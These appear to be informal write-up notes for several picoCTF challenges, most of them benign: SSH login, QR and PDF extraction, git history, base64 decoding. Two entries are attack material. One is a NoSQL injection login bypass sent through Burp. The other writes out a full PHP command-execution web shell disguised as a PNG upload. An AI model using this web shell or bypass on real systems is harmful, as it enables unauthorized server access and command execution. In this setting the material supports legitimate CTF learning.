Forensics

wget https://artifacts.picoctf.net/c_atlas/37/app.tar.gz tar -xvzf app.tar.gz open the burpsuit and login with any credentioal and interupt the network and send to repeater and edit this by : "email":"{\"$ne\": \"null\"}", "password":"{\"$ne\": \"null\"}" {“success”:true,“email”:“picoplayer355@picoctf.org”,“token”:“cGljb0NURntqQmhEMnk3WG9OelB2XzFZeFM5RXc1cUwwdUk2cGFzcWxfaW5qZWN0aW9uXzY3YjFhM2M4fQ==”,“firstName”:“pico”,“lastName”:“player”} “token”:“cGljb0NURntqQmhEMnk3WG9OelB2XzFZeFM5RXc1cUwwdUk2cGFzcWxfaW5qZWN0aW9uXzY3YjFhM2M4fQ==” picoCTF{jBhD2y7XoNzPv_1YxS9Ew5qL0uI6pasql_injection_67b1a3c8} nonsql injection trick User:{"$ne":“null”} Password: {"$ne":“null”}

I’ve gotten bored of handing out flags as text. Wouldn’t it be cool if they were an image instead? solution 1. ssh -p 64695 ctf-player@atlas.picoctf.net 2. ls you find the QR code in this 3. zbarimg flag.png zbar-tools is a Linux package that lets you scan and read barcodes or QR codes directly from the command line. It includes tools like: ✅ zbarimg → scans QR codes/barcodes from images (PNG, JPG, etc.) ✅ zbarcam → scans QR codes/barcodes live from a webcam

The Network Operations Center (NOC) of your local institution picked up a suspicious file, they’re getting conflicting information on what type of file it is. They’ve brought you in as an external expert to examine the file. Can you extract all the information from this strange file? Solution 1. wget https://artifacts.picoctf.net/c_titan/9/flag2of2-final.pdf 2. ls 3. convert flag2of2-final.pdf flag2of2-final.png 4. open flag2of2-final.png picoCTF{f1u3n7_ 5. apt install poppler-utils 6. pdftotext flag2of2-final.pdf 7. cat flag2of2-final.txt 1n_pn9_&_pdf_7f9bccd1} ...

Description: I made a cool website where you can announce whatever you want! Try it out! I heard templating is a cool and modular way to build web apps! Check out my website here! Hints: Server Side Template Injection Solution Browse to the web site and you will see a web page that includes the text Verify SSTI The hint has already given away that the site uses server-side templates but we need to verify that and find out the backend technology used. ...

Description Using a Secure Shell (SSH) is going to be pretty important. Can you ssh as ctf-player to titan.picoctf.net at port 52017 to get the flag? You’ll also need the password 6dd28e9b. If asked, accept the fingerprint with yes. solution ssh -p 52017 ctf-player@titan.picoctf.net ssh → Secure Shell, used to remotely log into another computer/server. -p 52017 → Specifies a non-default port (52017 instead of the usual 22). ctf-player@titan.picoctf.net → Says: username: ctf-player server: titan.picoctf.net after enter psd ...

Description What was I last working on? I remember writing a note to help me remember… You can download the challenge files here: challenge.zip solution wget https://artifacts.picoctf.net/c_titan/68/challenge.zip unzip challenge.zip cd drop-in/ cat message.txt finally ┌──(root㉿Harsh)-[/home/jhagan/h/drop-in] └─# git log commit 705ff639b7846418603a3272ab54536e01e3dc43 (HEAD -> master) Author: picoCTF <ops@picoctf.com> Date: Sat Mar 9 21:10:36 2024 +0000 picoCTF{t1m3m@ch1n3_b476ca06} conclusion 1. Git keeps history — even if the file is changed or deleted Git records every commit (change) with: A unique commit hash An author and timestamp A commit message Even if the file with the sensitive information is later removed or modified, the data can still be recovered by checking older commits. ...

Description I found a web app that can help process images: PNG solution create a file with name (untitle.png.php) edit this file PNG <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd'] . ' 2>&1'); } ?> </pre> </body> </html> upload this png file and type http://atlas.picoctf.net:58157/uploads/untitled.png.php RUN ls -al ls -al /var/www/html cat /var/www/html/GAZWIMLEGU2DQ.txt

I don’t like scrolling down to read the code of my website, so I’ve squished it. As a bonus, my pages load faster! solution curl http://titan.picoctf.net:50120/ seeing the clear CTF in output flag : class=“picoCTF{pr3tty_c0d3_dbe259ce}”

WebDecode Do you know how to use the web inspector? Start searching here to find the flag Solution inspect the about page and there is a source code right above that header is a section with this attribute notify_true=“cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMDJjZGNiNTl9”. from64 decord this and find the flag . USE : https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'') Flag: picoCTF{web_succ3ssfully_d3c0ded_02c…}

Description: Someone’s commits seems to be preventing the program from working. Who is it? You can download the challenge files here: challenge.zip Hints: In collaborative projects, many users can make many changes. How can you see the changes within one file? Read the chapter on Git from the picoPrimer here You can use python3 .py to try running the code, though you won’t need to for this challenge. Challenge link: https://play.picoctf.org/practice/challenge/405 Solution Analyse the git repo We start by unpacking the zip-file ...